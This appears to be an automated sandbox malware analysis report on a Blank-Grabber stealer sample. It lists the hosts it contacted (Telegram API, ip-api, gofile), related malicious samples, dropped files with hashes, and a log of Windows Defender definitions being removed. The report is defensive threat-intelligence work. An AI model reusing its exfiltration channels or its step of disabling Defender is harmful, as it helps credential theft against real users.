http://crl.thawte.com/ThawteTimestampingCA.crl0	Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://html.spec.whatwg.org/multipage/	Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ifeng.com/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.zhihu.com/	Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.iana.org/time-zones/repository/tz-link.html	Resource.exe, 00000001.00000002.2473117545.0000020AB3BAC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031700658.0000020AB3BB4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServer	Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	Resource.exe, 00000001.00000002.2472230674.0000020AB33C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.co.uk/	Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz	Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://json.org	Resource.exe, 00000001.00000003.2034221177.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033518977.0000020AB3976000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032559881.0000020AB3976000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.wykop.pl/	Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ip-api.com/line/?fields=hostingr~	Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/	Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.olx.pl/	Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefox	Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/	Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/mail/	Resource.exe, 00000001.00000002.2473117545.0000020AB3BCB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/mail/	Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/Blank-Grabber	Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584846
Start date and time:	2025-01-06 16:17:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	126
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Resource.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 142.250.186.35, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7308 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7288 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:17:57	API Interceptor	8x Sleep call for process: WMIC.exe modified
10:17:59	API Interceptor	156x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	SharkHack.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	paint.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	ddos tool.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	kthiokadjg.exe	Get hash	malicious	Blackshades	Browse	ip-api.com/json/
149.154.167.220	user.exe	Get hash	malicious	Unknown	Browse
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SharkHack.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	paint.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	ddos tool.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kthiokadjg.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
api.telegram.org	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse	149.154.167.220
TUT-ASUS	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SharkHack.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	paint.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	ddos tool.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kthiokadjg.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dll	snmpapi.exe	Get hash	malicious	Braodo	Browse
	snmpapi.exe	Get hash	malicious	Braodo	Browse
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse
	PDF_Resave.exe	Get hash	malicious	Unknown	Browse
	phost.exe	Get hash	malicious	Blank Grabber	Browse
	shost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse
	qhos.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse
	lz4wnSavmK.exe	Get hash	malicious	Python Stealer	Browse
C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd	Ruhsat_Bilgisi__.bat	Get hash	malicious	Blank Grabber	Browse
C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd	mei.exe	Get hash	malicious	Blank Grabber	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ? ? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	706272
Entropy (8bit):	7.927123566909474
Encrypted:	false
SSDEEP:	12288:sN5If7hE5vUZevY31R2XSefNY396zj9Z6E5gU/59l0vS38V+Igo8f9k:tf7wU31RySeC0zj9jgUxuVdj
MD5:	884F2862BB225DA14DE03497B80203BD
SHA1:	98A80402C0CCEB1A110141E00A7CCAB06A5EEB05
SHA-256:	072A2509282BF1B6F754143A7125AD7D4EC4B10ECA99ED844897A4E704B01F06
SHA-512:	51A002E5B3454AAF9AEE7E6F7233FE2BE534D35C0FEA5229C3541E6545BA2915F209D243657311FF3EEB7E5871C47DBCBC992CC791326C6EBB26C58DCF0B41B1
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mG........ms......c...~.VuU..UUt.V.{o......$.......$.,.@.S.E...9...d......./..............1#..;...7f......<9.'...N....^'?5..I......3.......Nx\|..7"S..\|_.....:~..q....-.Wl!..........y1.......0\|...Jo.C.b....H.G.}G0u......X..h.......w...b......S........].\|...J...L.TE..w.....X...{.A.=w.d.."....w.=...w..1...'.....A.Z~0+..>7.o..H.TL......g..L.%.......M.Y..\|_..z.wG...1S..Na....^{.......:Gc..1.....k,\|..z.-...%..2..w.knJ.W......t..3X..S........../.X...c....{e....\?...L..%.7,}E.g..2...X....u........\|..i..y...MK^~M..X......].-....9g.?.}.u..6M.uM..yu..qU.._..\|o9.. .v...9gEn...y......nW.9.K.>..,....hk...=.N.....0^.{....B..+...}.O+........#..=.......].k..../L.zY......\|.\|...v...-.......u3.....+.g].?..]//..-.%.S.s.o...s...;....S;\RX..yLN.s.Kv..P....!.}..v...m/)..;.....osq7.s.a..y_..b-......vy}n5^.m....d.\|..'.<A.y`n..;.1..{.....E%...%.\].

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.11065475060156
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjr8Uy0k9+MlWlLehW51IC1Uyt:QOaqdmOFdjrVY+kWResLI9O
MD5:	472980EC3BD6C21FA8C594AF7BC81E22
SHA1:	C29A27C06F4ADA10EAD9C09CBCCBDF4CFC74DC64
SHA-256:	04777FA9581A32122E435F7BC96CE369D2C313A8D9E6DC1023490898CD7C1D3E
SHA-512:	1210EA344C5980DC362461AFC98EA864ED55A40F9FA9947FE749208ABF57A9657E64771FBAE24B8C95E0B3FD5C08C655774547207EC66380754F7CF5D388A8C5
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. J.a.n. .. 0.6. .. 2.0.2.5. .1.0.:.1.8.:.2.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. M.o.n. .. J.a.n. .. 0.6. .. 2.0.2.5. .1.0.:.1.8.:.2.3.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RESB5E2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Mon Jan 6 16:30:41 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.115708050465364
Encrypted:	false
SSDEEP:	24:HPFq9s6Y5HHwK9GoWNXNII+ycuZhN+ZakSxuPNnqS+d:vMqwKZWNXu1ulMa3QqSe
MD5:	99E733D20FD5542FF08A200B4AA4ACD2
SHA1:	3F8987A014EF193860F0F1E300BA74040CCF7196
SHA-256:	16C0BDE5ECC2753157DD6B9E1808C9B93493D33D9098BCDC30670F6D6E20DA50
SHA-512:	A801D4B568F724C64C97BDFE0E9BB8B35DB3913E8B6373D8E23329B878FDD826AFECDEE44999A954F50FC06DE6DC43B7A2668A1A774CFA39DC12F3F6357A1981
Malicious:	false
Preview:	L...1.\|g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP................By.{.F.T.{.O..o..........5.......C:\Users\user\AppData\Local\Temp\RESB5E2.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.r.d.w.4.v.5.g...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109392
Entropy (8bit):	6.641929675972235
Encrypted:	false
SSDEEP:	1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:	4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:	489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:	A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:	D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: snmpapi.exe, Detection: malicious, Browse Filename: snmpapi.exe, Detection: malicious, Browse Filename: rename_me_before.exe, Detection: malicious, Browse Filename: PDF_Resave.exe, Detection: malicious, Browse Filename: phost.exe, Detection: malicious, Browse Filename: shost.exe, Detection: malicious, Browse Filename: sppawx.exe, Detection: malicious, Browse Filename: qhos.exe, Detection: malicious, Browse Filename: wsapx.exe, Detection: malicious, Browse Filename: lz4wnSavmK.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49432
